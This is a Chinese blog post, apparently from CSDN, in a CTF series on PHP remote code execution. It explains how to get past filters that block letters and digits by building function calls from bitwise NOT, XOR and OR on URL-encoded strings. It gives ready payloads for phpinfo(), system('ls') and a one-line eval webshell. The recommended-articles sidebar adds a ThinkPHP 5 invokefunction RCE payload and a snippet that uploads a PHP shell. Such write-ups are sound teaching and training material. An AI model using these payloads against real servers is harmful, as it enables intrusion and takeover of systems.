CTF php RCE (四)

最新推荐文章于 2024-09-12 16:40:17 发布
最新推荐文章于 2024-09-12 16:40:17 发布
阅读量835 收藏 7
点赞数 19
分类专栏: web CTF 基础 文章标签: php android android studio 经验分享 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_81040377/article/details/140341555
版权

0x08 取反以及异或、或

这两个东西呢相当的好玩,也能够达到一下小极限的操作

<?php
error_reporting(0);
if(isset($_GET['code'])){
            $code=$_GET['code'];
                    if(strlen($code)>40){
                                        die("This is too Long.");
                                                }
                    if(preg_match("/[A-Za-z0-9]+/",$code)){
                                        die("NO.");
                                                }
                    @eval($code);
}
else{
            highlight_file(__FILE__);
}

// ?>

随便找了个例题,观察一下,限制了字符长度,以及无字母数字RCE

取反 ~

就是我们将php代码url编码后取反,我们传入参数后服务端进行url解码,
这时由于取反后,会url解码成不可打印字符,这样我们就会绕过

直接看实验
写了一个非常简单的exp

<?php
$a='phpinfo';
$b=urlencode($a);
$c=~$b;
if(preg_match("/[A-Za-z0-9]+/",$c)){
    echo 0;
}else {
    echo 1;
}
?>

然后我在进行下一步检验即输出$B的时候发现我写错了

在这里插入图片描述

这样子才对,而且其中我们只能进行命令的拼接,并不能够直接写出一坨命令出来

<?php
$a='phpinfo';
$b=urlencode(~$a);
$c=~$b;
/*if(preg_match("/[A-Za-z0-9]+/",$c)){
    echo 0;
}else {
    echo 1;
}*/
echo $b;
?>

在这里插入图片描述
成功了,说明exp没问题了,但是有个问题就是我们写的命令不能是这类
system(‘ls’)
而只能写小🐎了,因为取反的问题

assert(eval($_POST[a]))

然后就行了,剩下的操作不讲了

异或 ^

同样是这个题
在这里插入图片描述

<?php
$a='A';
$b='1';
echo $a^$b;

?>

<?php
$a='A';
$b='1';
$c=$a^$b;
echo $c;
echo "\r";
echo ord($a);
echo "\r";
echo ord($b);
echo "\r";
echo ord($c);
?>

原理你拿过去跑一下就知道了
后面我打了一下发现很明显异或太长了
但是没关系我们可以构造phpinfo()玩玩
将两个字符的ascii转化为二进制 进行异或取值 从而得到新的二进制 转化为新的字符

异或规则:
1 XOR 0 = 1
0 XOR 1 = 1
0 XOR 0 = 0
1 XOR 1 = 0

我们就是将两个url编码异或成为一个字符,那么就能够达到命令执行的目的了

<?php
for($i=128;$i<255;$i++){
    echo sprintf("%s^%s",urlencode(chr($i)),urlencode(chr(255)))."=>". (chr($i)^chr(255))."\n";
}
?>

%81^%FF=>~     %82^%FF=>}       %83^%FF=>|
%84^%FF=>{     %85^%FF=>z       %86^%FF=>y
%87^%FF=>x     %88^%FF=>w       %89^%FF=>v
%8A^%FF=>u     %8B^%FF=>t       %8C^%FF=>s
%8D^%FF=>r     %8E^%FF=>q       %8F^%FF=>p
%90^%FF=>o     %91^%FF=>n       %92^%FF=>m
%93^%FF=>l     %94^%FF=>k       %95^%FF=>j
%96^%FF=>i     %97^%FF=>h       %98^%FF=>g
%99^%FF=>f     %9A^%FF=>e       %9B^%FF=>d
%9C^%FF=>c     %9D^%FF=>b       %9E^%FF=>a
%9F^%FF=>`     %A0^%FF=>_       %A1^%FF=>^
%A2^%FF=>]     %A3^%FF=>\       %A4^%FF=>[
%A5^%FF=>Z     %A6^%FF=>Y       %A7^%FF=>X
%A8^%FF=>W     %A9^%FF=>V       %AA^%FF=>U
%AB^%FF=>T     %AC^%FF=>S       %AD^%FF=>R    
%AE^%FF=>Q     %AF^%FF=>P       %B0^%FF=>O
%B1^%FF=>N     %B2^%FF=>M       %B3^%FF=>L
%B4^%FF=>K     %B5^%FF=>J       %B6^%FF=>I
%B7^%FF=>H     %B8^%FF=>G       %B9^%FF=>F
%BA^%FF=>E     %BB^%FF=>D       %BC^%FF=>C
%BD^%FF=>B     %BE^%FF=>A       %BF^%FF=>@
%C0^%FF=>?

phpinfo
('%8f%97%8f%96%91%99%90'^'%FF%FF%FF%FF%FF%FF%FF')

在这里插入图片描述

?code=('%8f%97%8f%96%91%99%90'^'%FF%FF%FF%FF%FF%FF%FF')();

成功

或 |

<?php


if(isset($_POST['c'])){
    $c = $_POST['c'];
if(!preg_match('/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i', $c)){
        eval("echo($c);");
    }
}else{
    highlight_file(__FILE__);
}
?>

这题我们使用或运算绕过
原理是利用url编码绕过
在这里插入图片描述

system
%73%79%73%74%65%6d
("%13%19%13%14%05%0d")|("%60%60%60%60%60%60%60")

在这里插入图片描述
我先弄的"ls"

双引号不能被正常识别改成单引号

'ls'
("%27%0c%13%27")|(%00%60%60%00)

system('ls')
("%13%19%13%14%05%0d"|"%60%60%60%60%60%60")("%27%0c%13%27"|"%00%60%60%00")

然后呢继续手动构造就行,我还不会写脚本

0x09 取反得到数字

这个是一个特性,我想单独拿出来说说
$(())为0

按位取反1变0,0变1

例子
~5值-6
在这里插入图片描述

所以我们叠加在括号其中即可

$((~$(())+~$(())+~$(())+~$(()))) 为-4

那么如何换回来呢,那么就是再来一层取反

$((~$((~$(())+~$(())+~$(())+~$(()))))) 为3

那么我们就学会了,我们如果需要数字为x,那么我们就需要(x+1)个  ~$(())  相加然后再进行取反即可
【网络安全 | CTF】攻防世界 php_rce 解题详析
等风来
05-22 7892
PHP RCE 指的是通过远程代码执行漏洞(Remote Code Execution)来攻击 PHP 程序的一种方式。简单来说,由于PHP应用程序没有正确处理外部输入数据(如用户提交的表单、请求参数等),此时通过某些手段向 PHP 应用程序中注入恶意代码,然后通过这些恶意代码实现对受攻击服务器的控制。由上图可知,flag字段储存在flag文件夹下的flag文件中。使用thinkphp 5.1.payload进行尝试,根据提示,使用5.0.20版本的Payload。说明命令执行成功,接着抓取flag即可。
CTFhub RCE靶场
qq_64703089的博客
08-06 639
通过管道符,可以将一个命令的标准输出管理为另外一个命令的标准输入,当它失败后,会执行另外一条命令。修改发送方法为post,目标修改为/?观察phpinfo得出需要用php://input。发现 flag_8051660913375.php。遂构造php://input发现行不通,所以用php://filter。发现有个php文件,cat一下。发现 flag_is_here。
CTFPHP 弱类型&异或取反&序列化&RCE
qi_SJQ_的博客
03-01 1164
PHP考点很多,思维导图只能包括大部分的考点,未必全,网上相关总结文章也很多,比如: CTF php总结(一)、CTF php总结(二)、CTF php总结(三)总结了比较常见的基础php题型。 虽然ctf web题原来以php为主,后来加入了python,现在又比较流行java,总体来说php仍然还是比较重要的。 随便几个知识选讲(而且很多知识也是综合考察): 1.php强弱类型比较: “==”是弱类型比较,只比较数值;“= = =”是强类型比较,会比较数值以及变量类型。最简单的是字符串与数字比较,不过.
ctf攻防世界 WEB题:php_rce
qq_30889301的博客
05-09 1116
ThinkPHP是一个基于PHP语言的开源Web应用框架,它提供了一系列的工具和组件,可以帮助开发人员更快速、更高效地构建Web应用程序。ThinkPHP框架具有简单易用、高效稳定、安全可靠等特点,被广泛应用于各种Web应用程序的开发中。对于thinkphp框架Github上有一个专用的漏洞验证工具:https://github.com/zangcc/Aazhen-v3.1。进入靶场后会看到以下内容,非常直观的说明了自己是thinkphp框架。此工具已经给一个可用的url案例,我们只需要更改就可以了。
CTF php RCE()
2301_81040377的博客
07-09 669
这种我们是先看到了include才会想到,利用伪协议来外带文件内容,但是有些同学会问,我们怎么知道文件名是哪个,哪个文件名才是正确的,那么这里我们就得靠猜了。
胡乱自学黑客的,能骂醒一个算一个
2401_84208172的博客
05-05 1107
为啥说胡乱自学黑客的,能骂醒一个算一个。因为很多人学会个工具就觉得自己是黑客了,其实再真正的黑客眼里,你就是个脚本小子而已。首先我谈下对黑客&网络安全的认知,其实最重要的是兴趣热爱,不同于网络安全工程师,他们大都是培训机构培训出来的,具备的基本都是防御和白帽子技能,他们绝大多数的人看的是工资,他们是为了就业而学习,为了走捷径才去参加培训。
XCTF-攻防世界CTF平台-Web类——3、php_rce(ThinkPHP V5.0框架远程代码执行漏洞)
Onlyone_1314的博客
09-03 1250
先访问题目场景: 主页提示我们:网页使用的是ThinkPHP框架,版本为5.0 这道题主要是考察:ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本。 攻击的exp是:http://111.200.241.244:61059/index.php?s=index/\think\app/invokefuncti
一次CTF题目对phpRCE的简单的思考
weixin_46263525的博客
07-16 1197
eval() 函数可以接受一个字符串作为参数,该字符串包含了 PHP 代码,并且会在运行时将这段代码解析执行。
bfengj#CTF#thinkphp5.0.24反序列化rce1
07-25
thinkphp5.0.24反序列化rceModel是抽象类protected $append = [];// $value值,作为call函数引用的第二变量p
ctf中常见php rce绕过总结
2302_76827504的博客
04-28 2491
只是总结一些常见的姿势,大佬轻喷。
异或加解密工具
01-01
CTF隐写中经常用到的工具,图片异或加密之类的题目
[wp] 攻防世界 php_rce
MercyLin的博客
09-25 7792
根据提示,上网搜了下thinkphp5 rce漏洞,改一改payload就出了emmm ?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat%20../../../flag");%27 下次写个...
攻防世界(进阶刷题)php_rce 以及ctf.show注入通关
qq_62046696的博客
06-01 1368
php_rce 这道题考察php远程漏洞问题 打开界面一看, 然后看师傅们的wp都是直接去,github去查Think PHP V5漏洞 然后随便找了一个输了进去发现,提示我们要用5.02的版本漏洞 6、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id ...
ctf web方向与php学习记录20之RCE初见
这周末在做梦的博客
10-16 532
一,RCE是什么? 1定义:RCE(remote command/code execute)远程代码执行,是互联网的一种安全漏洞。 2分类 (1)远程命令执行ping (2)远程代码执行evel。 3漏洞出现的原因 没有在输入口做输入处理。 注意:由于传入的必须是有效的 PHP 代码,所有的语句必须以分号结尾。 二,ctfhub——eval执行 先执行 url+/?cmd=passthru(“ls”);或 url+/?cmd=system(“ls”);后无有效信息。 然后输入 url+/?cmd=passt
BUUCTF-Reverse:xor(涉及异或脚本编写)
_Co1a
11-21 8341
xor一般指异或。异或,英文为exclusive OR,缩写成xor异或(eor)是一个数学运算符。 题目地址:https://buuoj.cn/challenges#xor 用IDA载入,寻找main函数,F5打开伪C代码: int __cdecl main(int argc, const char **argv, const char **envp) { char *v3; // rsi int result; // eax signed int i; // [rsp+2Ch] [rb.
CTF】异或运算符的利用
m0_52923241的博客
08-08 2686
异或运算符简介 mysql里异或运算符:^ 或者 xor; ^ xor 位异或 运算 逻辑 运算 如 1^1=0、 0^0=0、 0^1=1、1^1^1=0 、1^1^0=0、 1^2=3、 1^2=3 数字n xor 0会输出n;其他情况输出其他所有数据 异或运算规则:如果两个相应bit位相同,则结果为0,否则为1。 注释方法:‘ xxxx #、’ xxxx--+ 异或运算:可以取每个字符的ASCII,转成二进制再做运算,为了方便,copy一个脚本,通过查ASCII表的符合和
CTF题目中XOR加密解法脚本
热门推荐
欢迎来到神林的博客
04-10 1万+
0x00:xor加密原理 简单异或密码(英语:simple XOR cipher)是密码学中一种简单的加密算法,它按照如下原则进行运算: A {\displaystyle \oplus } \oplus 0 = A A {\displaystyle \oplus } \oplus A = 0 (A {\displaystyle \oplus } \oplus B) {\displaysty...
CTF-web 无字母数字RCE和Creat_function(
2302_80276789的博客
07-27 439
在上面的代码要求我们不能使用数字和字母,我们就要使用一种变换思想。
取反绕过和异或绕过——CTF学习笔记
2401_82847928的博客
09-12 3130
CTF比赛中,我们会遇到一些RCE的题,题目过滤了字母和数字甚至有一些特殊符号也被过滤了。这个时候我们使用一般的绕过是毫无作用的,这个时候我们需要利用PHPurl传参的一些特性去构造payload,执行远程命令
ctfrce
最新发布
03-11
### CTF竞赛中RCE(远程代码执行)攻击与防御技术 #### 攻击方法 在CTF竞赛场景下,利用远程代码执行(RCE)漏洞进行攻击主要依赖于发现并利用应用程序中存在的未充分验证用户输入的功能。当应用程序允许用户提交的数据被直接用于构建命令或脚本时,则可能存在RCE风险[^4]。 对于基于PHP的应用程序而言,如果存在`php://input`这样的伪协议滥用情况,那么攻击者可以通过精心构造HTTP请求体来实现恶意代码的上传与执行[^3]。此外,某些内置函数如`eval()`也会成为潜在的风险点,因为它会尝试解析传入字符串作为实际可运行的PHP代码片段。 为了成功实施一次有效的RCE攻击,在比赛中选手们往往会关注以下几个方面: - **寻找易受攻击的服务接口**:任何接受来自客户端数据的地方都可能是突破口。 - **绕过现有防护措施**:比如通过编码变换等方式规避简单字符过滤机制[^2]。 - **测试不同环境下的行为差异**:考虑到多平台兼容性问题可能导致的安全隐患。 ```python import requests url = 'http://example.com/vulnerable_endpoint' payload = '<?php system($_GET["cmd"]); ?>' response = requests.post(url, data=payload) print(response.text) ``` 这段Python代码展示了如何发送POST请求给一个假设存在的脆弱端点,并试图植入一段简单的PHP shell以供后续交互使用。 #### 防御策略 面对如此危险性的威胁,采取适当预防手段至关重要。以下是几种常见的防范建议: - **最小权限原则**:确保Web应用及其组件仅拥有完成必要任务所需的最低限度资源访问权。 - **严格输入校验**:无论是前端还是后端都应该对所有外部输入进行全面而细致地审查,拒绝非法格式的内容传递到内部处理逻辑之前[^1]。 - **采用安全框架/库**:现代开发工具包往往已经集成了许多经过良好设计的安全特性,可以帮助开发者更轻松地抵御已知类型的攻击模式。 - **定期更新补丁**:保持软件版本处于最新状态有助于及时修复官方发布的各类安全隐患报告所指出的问题。 ```bash sudo apt-get update && sudo apt-get upgrade -y ``` 上述Shell指令可用于Linux系统上自动化安装最新的安全更新包集合。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值